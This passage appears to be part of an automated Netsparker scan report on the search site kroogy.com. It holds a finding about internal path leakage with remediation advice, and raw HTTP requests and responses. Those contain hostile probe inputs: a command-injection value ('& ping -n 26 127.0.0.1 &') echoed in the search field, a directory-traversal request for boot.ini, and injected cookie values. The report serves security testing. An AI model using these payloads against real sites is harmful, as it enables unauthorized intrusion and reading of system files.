href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright"> </td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft"> </td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="'& ping -n 26 127.0.0.1 &" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td> </td><td> </td></tr></table></td><td class="searchtdright"> </td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">180,000</span> இல் <span class="resultcountstart">1</span>-<span class="resultcountend">10</span> முடிவுகள்</span></td> <td class="typesearchtd" align="right"><span class="typesearchtext">தேடு வலை</span></td> </tr> <..
[Possible] Internal Path Leakage (Windows)
[Possible] Internal Path Leakage (Windows)
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
Error messages should be disabled.
Remove this kind of sensitive data from the output.
External References
c:\boot.ini
Request
GET /search/web?search=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&type=web&fl=0 HTTP/1.1 Referer: http://kroogy.com/search/redir User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:06:34 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 8421 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - ../../../../../../../../../../boot.ini</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - ../../../../../../../../../../boot.ini"><meta name="keywords" content="Kroogy Search,search,search engine,../../../../../../../../../../boot.ini,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > பெருவிரல்சுவடை காமி <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft"> </td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright"> </td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft"> </td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="../../../../../../../../../../boot.ini" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td> </td><td> </td></tr></table></td><td class="searchtdright"> </td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">4,580,000</span> இல் <span class="resultcountstart">1</span>-<span class="resultcountend">10</span> முடிவுகள்</span></td> <td class="typesearchtd" align="right"><span class="typesearchtext">தேடு வலை</span></td> </tr> </table> </td> </tr><tr>&..